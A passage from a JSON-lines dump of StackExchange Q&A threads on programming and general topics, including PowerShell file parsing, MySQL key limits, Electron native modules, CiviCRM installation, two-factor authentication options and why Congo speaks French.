$batch should speed it up, but it will make it use more memory. Adjust that to suit your resources.\nComment: @jmolinor -- your version of the query made a HUGE difference. From 10 mins to 18 seconds. Amazing. The solution to the nul character problem can be found here: http:\/\/stackoverflow.com\/questions\/3806305\/powershell-2-0-generates-nulls-between-characters, but basically the issue is with the default encoding for powershell. The solution was to also include -encoding ASCII next to the -Append.\nComment: Thanks. I looked at it again, and did a little tuning. Not sure how much that will help the performance, but if I'm reading the docs right, compiled regexes are faster, and casting the variable as [regex] causes them to be compiled.\nComment: This is good, but I also need to compare every element of the array with the first element (header) and remove it if there is a match - because it is repeated throughout the file. This seems to be where things really bog down in the script. With your approach how do I do this without assigning gC to a variable?\nComment: Do you need to include one copy of the header at the beginning of the output file?\nComment: I updated the script. It should grab the header line from the file, trim off the leading and trailing |, and start a new $outfile using that for the header before the loop starts. 
Using [regex]::escape, it creates a new regex that does a literal match to the header line, and then a -notmatch on that added to the -match -replace chain should drop those out inside the loop.\nComment: @mjolinor, this works in pieces -- the header piece by itself and the body piece by itself (without the -Append), but when you run it all together then nul characters or spaces are inserted between every character in the file (within the body piece). Something to do with how the \"-append\" works?\nComment: @mjolinor: casting to [regex] doesn't compile the regex, but it does construct the Regex object once. It's difficult to speculate about performance, but in this scenario the disk IO is likely to dominate. Therefore, I suspect any casting vs. not casting vs. compiling the regex to have no noticeable effect.\nComment: Would you have to explicitly set the regex option to make it a compiled regex?\nAnswer: The <code>Get-Content<\/code> cmdlet does not perform as well as a StreamReader when dealing with very large files. You can read a file line by line using a StreamReader like this:\n<code>$path = 'C:\\A-Very-Large-File.txt'\n$r = [IO.File]::OpenText($path)\nwhile ($r.Peek() -ge 0) {\n $line = $r.ReadLine()\n # Process $line here...\n}\n$r.Dispose()\n<\/code>\nSome performance comparisons:\n<code>Measure-Command {Get-Content .\\512MB.txt > $null}\n<\/code>\nTotal Seconds: 49.4742533\n<code>Measure-Command {\n $r = [IO.File]::OpenText('512MB.txt')\n while ($r.Peek() -ge 0) {\n $r.ReadLine() > $null\n }\n $r.Dispose()\n}\n<\/code>\nTotal Seconds: 27.666803\nComment: `Get-Content` does **not** load the whole file in to memory, but assigning the result to a variable does. This is an important design principle in PowerShell - streaming through a pipeline can be memory efficient even for very large data sets.\nComment: If the comparison is choking, I wonder if the PC is having to page in\/out data as it checks the element x against element 0 because it can't fit the whole array of string in memory -- if so, $content[0] may not be a constant-time operation even though on a small dataset it could be assumed to be. Maybe try copying the contents of $content[0] into a new variable and compare against that instead of the array element.\nComment: That is a great suggestion. I should also point out that the get-content part of the script works pretty quickly; its that part where I loop through everything in the array comparing every element to the first element in the array that seems to make it run extremeley slow.\nComment: @JayBazuzi Fair point. Typically a variable is assigned to the output of Get-Content. I updated my answer based on your input. Thanks.\nComment: @daniel richnak, thanks for that comment - I hadn't considered that regarding the element 0.\nAnswer: This is almost a non-answer...I love PowerShell...but I will not use it to parse log files, especially large log files. Use Microsoft's Log Parser. \n<code>C:\\>type input.txt | logparser \"select substr(field1,1) from STDIN\" -i:TSV -nskiplines:14 -headerrow:off -iseparator:spaces -o:tsv -headers:off -stats:off\n<\/code>\nComment: This is a good non-answer. Powershell can be painfully slow with huge files. Coming from a linux background you expect to pipe stuff through grep fairly efficiently, but Get-Content and Select-String just don't compete. I love PowerShell too, but not when parsing and filtering massive log files.\nComment: As of 2023, this is not true anymore. 
you can use something like Get-Content input.txt -Buffer 1000 | ConvertFrom-CSV . The real difference is buffering the pipeline, remember powershell works on objects (not bytes), imagine calling a function for every line of a text file, now compare it with passing an array with 1000 lines.\n","meta":{"source":"stackoverflow","title":"How can I make this PowerShell script parse large files faster?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Primary key cannot hold more than 767 or 1000 character as primary key\n\nQuestion: I'm trying to create a table which one of their columns will hold characters more than 5000 characters and I don't want any row for this column to be repeated so I used a primary key to make every row in this column not save again when it's already exist\nBut the problem is when I'm trying to create this column with <code>column_name VARCHAR(5500) Primary key<\/code> it's giving me this error\n<code>Specified key was too long; max key length is 767 bytes<\/code>\nI searched a lot and found that <code>InnoDB<\/code> engine accepts only 767 characters as max length and in <code>MYISAM<\/code> engine accepts 1000 character but this doesn't help me because this column maybe hold more than 5000 character\nWhat I'm looking for is a way to create a column which no one of its rows can be repeated and accepts many characters\n<code>CREATE TABLE data_table (\n date_time VARCHAR(100),\n message VARCHAR(5500) PRIMARY KEY\n) ENGINE = MYISAM CHARACTER SET latin1\n<\/code>\nComment: Seems pointless you would just have to change 1 character for it not to be seen as a duplicate.\nComment: can you give me any suggestion for more effective solution ?\nComment: Run a `select` first? You can't index 5000 chars.\nComment: I found that `Memory` Engine can hold 3072 character as max length maybe it's can work although that i was hope to found engine who can hold more that this or if there's no limitations \nComment: Another thread suggested storing a hash. You'd just need to worry about hash collision in that scenario. If the odds of that are acceptable for your app could do that.\nComment: Change latin1 to utf8mb4\nComment: Please share more details. Why do you need to use a primary key on a message?\nComment: @Dharman changing to utf8mb4 cuts the limit to 767\/4 or 1000\/4 _characters_. The index limit is \"bytes\"; the number in VARCHAR is \"characters\".\nAnswer: You have hit a fundamental limitation. Sadly, no amount of negotiation or hacking will find you a way to make an index as long as you need. Therefore, a unique index is not a solution to your problem of preventing duplicate text strings.\nMany people store a hash of long text fields along with the text.\nSHA-256 is a decent choice for a hash. The issue with hashes is the chance of a hash collision. That is, it is possible that two different text strings will generate the exact same hash. With SHA-256 or larger hashes, that chance is very low indeed.\nIf you work with SHA-256, you need a column defined like this. (32 bytes is the same as 256 bits, of course.)\n<code>text_hash BINARY(32)\n<\/code>\nThen when you go to insert text you can do this.\n<code>INSERT INTO tbl (text, text_hash) VALUES(?, UNHEX(SHA2(?, 256));\n<\/code>\nIf you make your <code>text_hash<\/code> into a unique index you'll have a way of preventing duplicates by throwing an error when trying. 
Something like this.\n<code> CREATE UNIQUE INDEX no_text_dups_please ON tbl(text_hash);\n<\/code>\nAnswer: Needs : \"[one] column will hold characters (more than 5000 characters) and I don't want any row for this column to be repeated\"\nPRIMARY KEY add a UNIQUE CONSTRAINT on the field(s) specified, but if you don't need to use it as PRIMARY KEY use only UNIQUE. In addition, I would not recommend UNIQUE CONSTRAINT on large text column.\nI would recommend you to check the unicity of your data by making and storing hashs of your texts.\nAnswer: Sure, the Hash is one way. (I think the latest MariaDB has a technique for doing that by magic!) Here's another approach:\nFor many reasons, you should switch from MyISAM to InnoDB, but I will ignore that for this Q&A.\n<code>CREATE TABLE data_table (\n date_time VARCHAR(100),\n message VARCHAR(5500) PRIMARY KEY\n INDEX(message(100))\n) CHARACTER SET utf8mb4 -- since you might get non-English test, including Emoji.\n<\/code>\n(The \"100\" is a tradeoff between speed and space.)\nBut you will have to do an extra test:\n<code>SELECT 1 FROM data_table WHERE message = ?\n<\/code>\nIf you get something back, you have a dup -- take action. Else do an INSERT.\nOops, I do need to insist on InnoDB -- at least if you could have conflicting connections inserting the same message:\n<code>BEGIN;\nSELECT 1 FROM data_table WHERE message = ? FOR UPDATE;\nif ... then handle dup and don't COMMIT\nINSERT INT data_table (date_time, message) VALUES (?, ?);\nCOMMIT;\n<\/code>\nYou might want to hide all that inside a Stored Procedure.\n","meta":{"source":"stackoverflow","title":"Primary key cannot hold more than 767 or 1000 character as primary key","dup_signals":{}},"subset":"stackexchange"} +{"text":"Template completion\n\nQuestion: In version 8, if one evaluates\n<code>test::usage=\"test[x,y]\";\n<\/code>\nthen types <code>test<\/code>, then shift-cmd-k (or shift-ctrl-k), a template appears with placeholders for <code>x<\/code> and <code>y<\/code>. \nIn version 9, this does not work: if I evaluate the same thing, when I type <code>te<\/code>, I am offered the choice to select <code>test<\/code> from the dropdown menu, just like for the built-in functions. If I select <code>test<\/code> and then press shift-cmd, however, I do not get the template (whereas I do get a template for built-in functions if I do this).\nHow do I get the frontend to show a template?\nNote: This has been fixed as of 9.0.1\nComment: I haven't downloaded version 9, but my suspicion would be that they now draw their template information from somewhere else, not `test::usage`. Maybe you can poke around to see if there is something like `test::template`? That's only a wild guess - it's what might make sense if this is actually an enhancement and not a bug.\nComment: I *think* the completion information is stored here: `FileNameJoin[{$InstallationDirectory, \n \"SystemFiles\/Kernel\/TextResources\/English\/FunctionInformation2.m\"}]`. You will need to `Uncompress` the file after importing it as `String`. The *actual* usage messages are also in that directory, stored in `Usage.m`. If you look at most packages, the `::usage` messages are plain text only, but when you load the package, and `?` the symbol, you'll get a nicely formatted usage message with italicized arguments. This comes from `Usage.m`, not from the package file.\nComment: Apparently, I was a little heavy handed with the \"remove all instances of v.9 tag.\" Reverting ...\nComment: @Jens that's a good idea. 
I can't see anything other than the usual `usage` messages, but maybe I am missing something. Let's see if someone else can find something\nComment: It doesn't work for me with version 9 on Win 7, 64-bit.\nComment: I would also like to know how to make my own InputAliases appear on the autocomplete list...\nComment: So this should also be tagged version-9 bug ...right?\nComment: @MikeHoneychurch yes I think so. Done!\nComment: `FunctionInformation.m` contains syntax colouring info, I think.\nComment: For completeness sake: Related question \u2014 http:\/\/mathematica.stackexchange.com\/q\/19816\/5\nAnswer: To clarify the situation: In Version 9 on Windows and OS X, there is a new Make Template system which supports multiple templates for built-in functions. As part of the new system, unfortunately a bug was introduced which makes it ignore the usage statement for user-defined functions. This bug has been confirmed and we hope to fix it in a future release, though I cannot make any prediction as to when. The Linux front-end does not yet feature this new make-template system due to certain technical obstacles, which means it also does not suffer from the new bug. \nThere also seems to be some confusion as to how to invoke make template in version 9. Here is how it works: the new code assist offers possible completions as you type instead of forcing you to hit Ctrl\/Cmd-k. Now, if you select a completion from the code assist using Enter, Tab, or left click, you will notice that a small down arrow appears, like so: . This down arrow is the collapsed template list. And this point, you can activate Make Template either using Ctrl\/Cmd-Shift-k, or by hitting DownEnter to expand the arrow. Alternatively, if you've typed in a complete symbol, then Ctrl\/Cmd-Shift-k will activate make template even if you haven't selected something from the code assist. Unlike previous version, Make Template does not currently attempt to complete a symbol before opening the template menu.\nComment: It's worth noting that you may specify a popup delay for autocompletion -- so you don't get the popups when you know what function you want but do get them when you're uncertain. Set this on the Mathematica 9 Preferences dialog, Interface tab.\nAnswer: Partial solution for Linux (Ubuntu 12.04, GNOME 3.4.2)\nIn version 8 I can expand it into a template the same way that normal expansion works. In version 9 this seems to work differently. You have to expand (or type) the full function name first and press then Ctrl+Shift+K\n<code>xxyyzz::usage = \"xxyyzz[x,y]\";\n<\/code>\nNow I type \n<code>xx\n<\/code>\npress Ctrl+K and then Enter and I get\n<code>xxyyzz\n<\/code>\nthen I can use Ctrl+Shift+K to do the template expansion. This is still a bug to me though.\nComment: I can get up to he `xxyyzz` part, but after that if I press shift-cmd-k, nothing happens. do you get the `xxyyzz[x, y]` thing? what do you press, the same as in earlier versions? (shift-ctrl-k?)\nComment: This doesn't work for me on OS X.\nComment: Me too, Win 7 x84. I filed a bug report.\nComment: if this bug is confirmed on MMA9, it would be very annoying for me. I get the template working well for my\/standard functions in MMA8. I will get MMA9 later today and we will see.\nComment: @acl After some hours of sleep I tried this again. On Linux-x86-64 this is exactly the way it works.\nComment: OK I see. 
It would be useful for others on windows and linux to also try; so far it seems that 3 of us find it not working on OS X, 1 found it not working on win8 but could not check in detail, and?\nComment: It would be useful if the people upvoting also wrote a comment saying eg \"yes, it works here too with this OS\" (if that's why they are upvoting)\nComment: This doesn't work for me on Windows 7 64bit.\n","meta":{"source":"mathematica.stackexchange","title":"Template completion","dup_signals":{}},"subset":"stackexchange"} +{"text":"Plotting the fundamental diagram of traffic flow\n\nQuestion: I have a traffic simulation and I don't understand how I can plot the fundamental diagram (flow rate vs density). I simulate the traffic as follows:\nI have a matrix that has as many columns as the the road length, and rows as time steps. Every car is represented by 1 in the matrix. I have lists to keep track of the index and speed of a car. I loop over N time steps so that the traffic evolves over time according to some rules.\nI have looked at wikipedia and tried to find something online to help me but no luck so far in understanding it. How do I derive the data in order to plot the fundamental diagram?\nMy nested list where the first index is the position of the car and the second is its speed:\n\ncarIS[[0, 2], [1, 0], [2, 0], [3, 0], [4, 0], [6, 1], [7, 0], [9, 1],\n [10, 0], [11, 0], [12, 0], [13, 0], [16, 2], [19, 0], [20, 0], [22,\n 1], [24, 0], [26, 1], [28, 0], [30, 1], [31, 0], [32, 0], [33, 0],\n [34, 0], [35, 0], [36, 0], [39, 2], [40, 0], [41, 0], [42, 0], [43,\n 0], [44, 0], [45, 0], [46, 0], [47, 0]]\n\nThis list is produced with every time step. What should I do in order to generate the fundamental plot?\nComment: Is it a question of how you technically display the plots or how you derive the data for the plots? Please be more precise.\nComment: @JensH\u00f6pken I have a problem with deriving the data for the plots\nComment: If you could give an example for the data, that would be of great help as well.\nComment: @JensH\u00f6pken I have updated my question. I have seen the wikipedia page but I still don't understand it\nComment: As long as you don't know what data you have stored inside your list, you won't be able to plot anything. Understand the problem first, go back the literature and get a solid understanding of what you have simulated. You see where I am going with this?\nAnswer: If by fundamental plot of traffic flow you mean this diagram: \nYou can create these easily using Matplotlib.\nComment: Yes that is the one! I have seen this page but I still don't get what I should do\n","meta":{"source":"stackoverflow","title":"Plotting the fundamental diagram of traffic flow","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why do OpenGL methods not return anything?\n\nQuestion: This is just out of curiosity. I couldn't help but noticing that none of the OpenGL methods return anything, even though some of the methods would seem to be more typically implemented with a return.\nFor example, <code>glGenBuffers<\/code> has two parameters, the number of buffers you want to generate, and variable you want to store them in. However, I would think that most people would code it as a method that only takes one parameter, the number of buffers you would like to create, and return those buffer(s). Is this for speed reasons? Or perhaps some other antiquitous reason?\nComment: Well, there *are* functions that return values, that fit into a primitive variable. 
glCreateShader and glCreateProgram.\nAnswer: In C, it is hard to return an array of anything without introducing dynamic memory allocation.\nSo to \"return\" multiple names from <code>glGenBuffers (...)<\/code>, the easiest solution is to pass a pointer to an array and have the API call store the generated names in the pre-allocated array.\nComment: Not only that, it's for portability. If it returned an array of dynamically allocated memory, that would add a dependence on the C standard library and would also require the user to free that memory. By never returning memory a GL implementation allocates dynamically, those issues are completely avoided.\nComment: Actually, it is the only sane way to do so. I would literally hate library that allocates memory when it really shouldn't, and doesn't provide a way to avoid it.\nComment: @keltar now a reason to hate the library is the statefulness of it (binding buffers before using them), I would vastly prefer the EXT_direct_state_access extension for that\nComment: @ratchetfreak I wasn't talking specifically about GL, but I'm still ok with that. Anyway, isn't 4.5 allows direct state access everywhere?\nComment: How about [glGetShaderiv](https:\/\/www.khronos.org\/registry\/OpenGL-Refpages\/gl4\/html\/glGetShader.xhtml), which only returns a `GLint`?\n","meta":{"source":"stackoverflow","title":"Why do OpenGL methods not return anything?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Node Electron Require issues with SQLAnywhere - Error: Could not load modules\n\nQuestion: I'm new to Electron and am having issues using the sqlanywhere package with it.\nI'm doing a very basic test, and sqlanywhere is throwing an error immediately when it is trying to load its drivers. Note that this works fine until I involve Electron in this application.\nHere is my sample code:\n<code>const sqlanywhere = require('sqlanywhere');\nconst url = require('url');\nconst path = require('path');\nconst { app, BrowserWindow, Menu, Tray, ipcMain } = require('electron');\n\nlet conn = sqlanywhere.createConnection();\n\nvar conn_params = {\n Host : 'localhost:2638',\n UserId : 'user',\n Password: 'password',\n ConnectionPool: 'YES(MaxCached=10)'\n};\n\nconn.connect(conn_params, function(err) {\n\n if (err) throw err; \n\n conn.exec('SELECT * from mytable', function (err, result) { \n if (err) throw err; \n console.log(result[0]); \n conn.disconnect();\n })\n});\n\nlet mainWindow;\n\n app.on('ready', () => {\n\n console.log(\"Started...\");\n\n \/\/ Create Window\n mainWindow = new BrowserWindow({\n width: 200,\n height: 200 \n });\n\n \/\/ Load HTML file into Window\n mainWindow.loadURL(url.format({\n pathname: path.join(__dirname, 'mainWindow.html'),\n protocol: 'file:',\n slashes: true\n })); \n\n});\n<\/code>\nThe error thrown is:\n\"Uncaught Exception: Error: Could not load modules for Platform: 'win32', Process Arch: 'x64', and Version: 'v7.9.0\"\nIt seems to me that the way Electron is handling the 'require' statements in the sqlanywhere package is causing the problem. The index.js of sqlanywhere is:\n<code> \/\/ ***************************************************************************\n \/\/ Copyright (c) 2017 SAP SE or an SAP affiliate company. 
All rights reserved.\n \/\/ ***************************************************************************\n var db = null;\n var driver_file = \"sqlanywhere\"\n\n var v = process.version;\n var match = v.match( 'v([0-9]+)\\.([0-9]+)\\.[0-9]+' );\n driver_file += '_v' + match[1];\n if( match[1]+0 == 0 ) {\n driver_file += '_' + match[2];\n }\n\n try {\n if( process.arch == \"x64\" ) {\n db = require( \".\/..\/bin64\/\" + driver_file );\n\n } else if( process.arch == \"ia32\" ) {\n db = require( \".\/..\/bin32\/\" + driver_file );\n\n } else {\n throw new Error( \"Platform Not Supported\" );\n }\n } catch( err ) {\n try {\n \/\/ Try finding natively compiled binaries\n console.log(\"Error thrown\"); \/\/ added by me\n console.log(\"DB: \" + db); \/\/ db is null\n db = require( \".\/..\/build\/Release\/sqlanywhere.node\" ); \n } catch( err ) {\n throw new Error( \"Could not load modules for Platform: '\" + \n process.platform + \"', Process Arch: '\" + process.arch +\n \"', and Version: '\" + process.version +\"'\" ); \n }\n }\n module.exports = db;\n<\/code>\nI've added the two console.log statements above to confirm the catch block is being executed, and that db is still null at this point, when it should have loaded the x64 driver. Again, this works until Electron is involved.\nIt seems Electron may be having issues with\n<code>db = require( \".\/..\/bin64\/\" + driver_file );<\/code> \nIf anyone could offer any insight I would be forever appreciative!\nThanks\nAnswer: I assume module you are try to load contains native module. Native module requires version matching between node.js process to compiled binaries, meaning if node.js version does not match between your node installation to Electron, module won't be able to loaded. You could match those specific version between, or use https:\/\/github.com\/electron\/electron-rebuild to generate correct binaries.\nComment: Thanks, I was able to use electron-rebuild to resolve this\n","meta":{"source":"stackoverflow","title":"Node Electron Require issues with SQLAnywhere - Error: Could not load modules","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to produce struct addrinfo from struct sockaddr?\n\nQuestion: I have a struct sockaddr and need to make a struct addrinfo (specifically that, because that's what some other API wants). The IP address may be IPv4 or IPv6. What's the best way to handle that?\nAnswer: From man 3 getaddrinfo,\n<code>struct addrinfo {\n int ai_flags;\n int ai_family;\n int ai_socktype;\n int ai_protocol;\n size_t ai_addrlen;\n struct sockaddr *ai_addr;\n char *ai_canonname;\n struct addrinfo *ai_next;\n};\n<\/code>\nA <code>struct addrinfo<\/code> contains more information than just a <code>struct sockaddr<\/code> does. Given a <code>struct sockaddr_in<\/code>, you can have some of this information (<code>.ai_family = AF_INET, .ai_addrlen = sizeof(struct sockaddr_in)<\/code>). Whether this is sufficient depends on what the other API is looking for.\nComment: Yes, creating a new addrinfo, putting the sockaddr in *ai_addr and filling the other fields with reasonable values seem the way to go.\n","meta":{"source":"stackoverflow","title":"How to produce struct addrinfo from struct sockaddr?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can we install civicrm extension which is not available for drupal\n\nQuestion: I want to add civi hr extension to drupal. But is not available in drupal. \nAnswer: You need to first get into the extension directory, and download the extension directly. 
Then you can install the extension from Manage Extension Page.\n<code>wget https:\/\/github.com\/civicrm\/civihr\/archive\/1.3.0.zip\nunzip 1.3.0.zip\nmv civihr-1.3.0 civihr\n<\/code>\nYou can now move to <code>Administer>System Settings>Manage Extensions<\/code> Install CiviHR and you are good to go.\nThis link can help you further.\n","meta":{"source":"civicrm.stackexchange","title":"How can we install civicrm extension which is not available for drupal","dup_signals":{}},"subset":"stackexchange"} +{"text":"Set passed value in my ActionResult\n\nQuestion: I have two independent classes that model my tables. First when a new user is created, the user does not have a record in the certificate tables. So in the view for the certificates I have added a button to add certificates details for this new user. \n This is my code for the user view: I omitted the paging\/search and filter code to make it simple\n<code>public ActionResult Index()\nvar recipients = from s in db.User\n select s;\n return View(recipients.ToList());\n<\/code>\nThis is the details view showing related data:\n<code> public ViewResult Details(int id)\n {\n\n var certificateDetails = db.Certificate.Where(p => p.ID == id);\n return View(certificateDetails);\n }\n<\/code>\nAdding a new user means also adding a new certificates details. I want when a user clicks details for the a particular user if those details aint around to be redirected to a create certificate view with both User.ID and CertificateID set. In fact CertificateID is AI but ID from User is foreign key. \nI would have used Fluent API but am not good with it either so have to handle this seemingly small challenge in code. \nAnswer: If I understand your question correctly, you want it so that when you view Details(), if the certificate details don't exist, then redirect to a page to create them?\nJust check whether or not the entity exists. If it doesn't, return a RedirectToAction() and pass whatever data you need in the route data collection. \n<code>public ViewResult Details(int id)\n{\n var certificateDetails = db.Certificate.FirstOrDefault(p => p.ID == id);\n\n if (certificateDetails == null)\n return RedirectToAction(\"Create\", \"Certificate\", new { userId = id });\n\n return View(certificateDetails);\n}\n<\/code>\nYou'll also need to create a Certificate controller with a Create() action. \nComment: Does this answer your question? If you have the Certificate controller, then all you need to do is redirect to it. Also you should accept some of your old questions, you'll get a better response rate.\nComment: SingleOrDefault() just returns a single object matching the criteria, or null if it doesn't exist. If more than one object matches the criteria, it throws an exception. You can change it to any database query you want. The problem with just calling Where() is it doesn't actually execute the query. So .Single(u => u.Id == id) is analogous to .Where(u => u.Id == id).Single();\nComment: I have Certificate controller, will edit my question to reflect that. I am using POCO classes i.e code first.\nComment: Thanks for the added suggestion and answer. That change from where to SingleOrDefault has created problems in my sorting code when the if statement is false. 
it can not accept OrderBy.\nComment: How then do I let the else statement have a list not a single object?\nComment: whats happening is my view is throwing an exception when the table is not null saying Sequence contains more than one element.\nComment: It's because Single() throws an exception if there's more than one element that matches. You need to change it to ToList() if you want to load a collection. The Single() stuff isn't related to the question you asked, it was just what I used in my answer. You can change it to whatever query you want.\n","meta":{"source":"stackoverflow","title":"Set passed value in my ActionResult","dup_signals":{}},"subset":"stackexchange"} +{"text":"For 2FA, is one method better (more secure) than another?\n\nQuestion: There are a variety of options available for 2FA - LastPass, for example, offers all of the following options:\n\nLastPass Authenticator\nDuo Security Authentication\nGoogle Authenticator\nYubikey Multifactor Authentication\nRSA SecurID\nSesame Multifactor Authentication\n\n... and so on. I've heard of other 2FA options too - SMS, SmartCard, TOTP (not sure exactly what that is), and so on.\nAs near as I can tell, it seems like the main distinction is between hardware-based solutions (e.g., Yubikey) and software-based solutions (e.g., the various 'Authenticator' smartphone apps).\nFrom an information security POV, does one of these options offer a higher level of security? Put another way, for the average user, what's the most secure form of 2FA available?\nComment: There is no universal 'more secure', only what meets your requirements and threats. SMS is really weak, but stronger than passwords. There are attacks against hardware tokens and they are expensive. If you have consultants, then reusable licenses and software tokens might be better. If you need to meet PCI requirements, you will need 2FA for non-console admin access, etc. etc.\nComment: @nowen - I'm a graduate student in computer engineering who's had his data stolen in the OPM hack (and possibly a couple others). So I guess by \"average user\", I mean \"me\" haha. It seems you're saying that hardware tokens are generally a bit more secure for personal use? Or am I reading into that too closely and the first sentence (\"there is no universal 'more secure'\") is most important?\nComment: lol, no I guess you are not. You in particular need to worry about SE attacks that might use your personal data in some way. I do not think anything is 'more secure' or 'less secure' except in relation to your goals and environment. If you are most worried about the lost data about you, then you should avoid services that rely on it for password resets or initial validation. You sound savvy enough to avoid malware on your device, so tokens there are fine. However, SMS relies on the security of the carrier and not just you, so that's a different equation.\nComment: TOTP is an algorithm that is used by e.g. the Google Authenticator. HOTP can be used by Yubikey. https:\/\/www.ietf.org\/rfc\/rfc4226.txt, https:\/\/tools.ietf.org\/html\/rfc6238. RSA SecurID uses a proprietary algorithm.\nAnswer: Generally speaking, all of these security products are solid enough for casual end-users. When it comes to end-users, most of the vulnerabilities come from the way the person uses it, not from weakness in the method itself. For example, do you leave your RSA SecureID card where your kids have easy access to it? 
If you use a code generating app, then does your phone have a strong password lock on it?\nAs mentioned by @SteffenUllrich, if you happen to get spyware on your mobile device with root access - which is more common than you might expect (see StageFright and drive-by downloads) then your SMS, email, and maybe even app based methods could be compromised.\nI think that if you've careful about how you use it, and have good security practices on your devices, then any of these methods are fine for the average end-user worried about drive-by (ie non-targeted) password cracking from database leaks. If you want to go the extra mile and sacrifice some convenience, then I suppose the ordering would be <code>SMS\/email < app\/OTP\/TOTP < hardware token<\/code>.\n\nNow, if you're not an \"average\" end-user, but a high-value target that nation state actors are trying to break into, then everything changes. For example, if you've made enemies with the US government's NSA then they can sniff any code sent to you over SMS or email, and can likely sniff the packets of the first-time setup of the Google Authenticator app (or, you know, just ask Google for the code). In this case, hardware tokens really are king because they are entirely \"out of band\" (ie nothing sensitive ever crosses the internet).\n\nJust for completeness, here is a copy of the tag wiki from the multi-factor tag (which I wrote).\nYou can break 2FA methods into three broad categories:\n\nSomething you know - information, like a password, or your mother's maiden name, or a public key stored in a key file.\nSomething you have - usually a physical object like the phone that can receive SMS at your number, or a One-Time-Password (OTP) token or public-key enabled smart card \/ USB stick:\n\nSomething you are: aka \"biometric\" like fingerprints, iris, voice, typing rhythm, etc.\n\nThe reason for splitting auth methods into these categories is that each one requires a very different kind of theft in order for a hacker to acquire it.\nIf you are required to provide a proof of identity from more than one of the above catogories, then it is properly \"Two Factor Authentication\", or \"Multi-Factor Authentication\". If you are providing multiple items from the same category, then it's called \"Multi-Step Authentication\", which is obviously weaker than multi-factor.\nComment: I think there is a major difference between specialized hardware tokens and apps on the smartphone or SMS. In the latter case it is often sufficient that an attacker manages to install a privileged application to get to the secrets or to read the SMS. And because of insufficient security of the phones such installations might be done [using a MMS](http:\/\/www.howtogeek.com\/225834\/stagefright-what-you-need-to-know-and-how-to-protect-yourself\/), a [drive by download](https:\/\/blog.fortinet.com\/2014\/02\/16\/new-drive-by-download-android-malware) or similar.\nComment: @SteffenUllrich That's a good point, I'll edit.\nAnswer: When thinking of two factor authentication or multi factor authentication you have to take a look at the 2nd factor - in case of possession.\n\nThe possession factor needs to be unique\nYou need to realize, when it was stolen \/ compromized\nYou need to be able to revoke this and reenroll it. 
(bad for biometrics)\n\nAuthentication devices\nYou can differentiate authentication devices like\nhardware <--> software\nseedable <--> not seedable\nHardware devices will store the secret key, which in fact in the incarnation of the possession factor in hardware. The secret key can \"not\" be stolen without you realizing it.\nBut You also have to take care about the distribution process. non seedable hardware will come with a seed file on a disc. If the vendor keeps a copy of the seeds the hardware tokens may be compromized, without you knowing it.\nseedable tokens are a great way to avoid this. But note: A google authenticator is also a \"seedable\" token. You yourself are generating the secret key. But the storage of this secret key is not that good, as we are dealing with a software token...\nAuthentication backend\nAlso you need to take a look at the authentication backend.\nYou need to make up your mind if you are fine with a hosted service. So you need to trust the provider. If you are running on premise, you may choose between closed source and open source solutions. Pick this one, which you feel more secure with. \nDisclaimer: I am involved with privacyIDEA, which is an open source on premise authentication solution which supports all mentioned token types above.\nBottom line\nI wanted to point out, that it is difficult to define a security level ranking. As the security is... ...multi dimensional and depends on a lot of factors to take into account. \nIf you decide for a certain technology or solution. Write down your thoughts and the decision making process, so that you know which side effects or drawbacks you are willing to take. Security is never 100%. And it is always good to know the weeknesses or limitations of the system you are using.\n","meta":{"source":"security.stackexchange","title":"For 2FA, is one method better (more secure) than another?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why has the Congo ended up French-speaking but not Flemish-speaking?\n\nQuestion: Why is there hardly any Flemish linguistic heritage in the former Belgian colonies, at least at the institutional level?\nEDIT (Evidence of prior research): Neither the Democratic Republic of the Congo nor Rwanda have Dutch as their official or national language, contrary to French.\nComment: I'm reluctant to close a question with an answer.\nComment: @MarkC.Wallace I know what you mean. On the other hand, I've fielded so many \"*Why was my question closed when [another equally off-topic question] wasn't?*\" type questions that I also feel that if it's off-topic it should be closed, whether it has an answer or not (probably a variant of 'broken-window theory'). I'm always conflicted in these cases.\nComment: I saw a documentary that has a good explanation. French was the official language. Anyone had to speak and understand it. Amongst themselves - mainly the Flemish officers, of course - Flemish was used to keep things secret from the general population. So when Congolese heard Flemish, they knew something bad was going to happen. They hated French, but even more Flemish.\nComment: @sempaiscuba I would be willing to agree that the question is \"too basic\" in the sense that a simple reference to the answer could be found (albeit a relatively obscure one for the casual history afficionado). That said, I quite disagree that it's off-topic. 
If asking about the linguistic heritage of Belgian colonization in the Congo is off-topic, then what isn't?\nComment: Besides, just because a question can fit as one-liner, doesn't make it \"too basic\". If anything, I'd say it makes it more elegant.\nComment: @Tfovid The question is \"too basic\" because typing the keywords from your question into Google returns the answer (in my case, the article cited by Brian Z appears on the first page of results returned). As our [Help Centre](https:\/\/history.stackexchange.com\/help\/on-topic) makes clear, \"*Questions answered by a simple Google search or to be found in a Wikipedia page*\" are generally off-topic on History:SE\nAnswer: This article, \"A Brief History of Dutch in Africa\", explains:\n\nFrom the start, Stanley worked with officers and agents of a variety of nationalities, many of them Belgians. These Belgian nationals were of either Dutch-speaking or French-speaking origin. As at that time French was still the only language for all formal communication in Belgium, the Belgian officers and agents in the Congo quite naturally used French as the official language among them and for writing. [...] In sum, the arrival of Flemings in the Congo in the late 1870 and 1880s, marked the beginning of a structural presence of Dutch in Central Africa, albeit always under the hegemony of French as official language.\nComment: Also consider that some neighbors (including, right across the river from Kinshasa, Congo-Brazzaville, who also had to share the Congo river) were french colonies - no nearby dutch speakers. And this is quite analogous, albeit in minor scale, as \"why is there no large catalan, basque or galician linguistic heritage in Spanish America\"\nComment: At least in the beginning until 1908, the Congo Free State was not a Belgian colony but personal property of Leopold II who, like most Monarchs in Europe, primarily conversed in French.\nComment: Alright, so the explanation lies \"upstream\", namely in the fact that French was the main language of Belgium.\nComment: Until displaced by English around WWII, French was perhaps the primary language of international diplomacy and much culture, and (at least until the 1970s) was perhaps the most widely taught second language in English-speaking countries. So learning French would have utilitarian benefit, unlike Flemish or Dutch.\n","meta":{"source":"history.stackexchange","title":"Why has the Congo ended up French-speaking but not Flemish-speaking?","dup_signals":{}},"subset":"stackexchange"} +{"text":".NET equivalent of java.awt.color.ColorSpace\n\nQuestion: I'm trying to port a library from Java to .NET that makes heavy use of the java.awt.color namespace. What is the .NET equivalent to 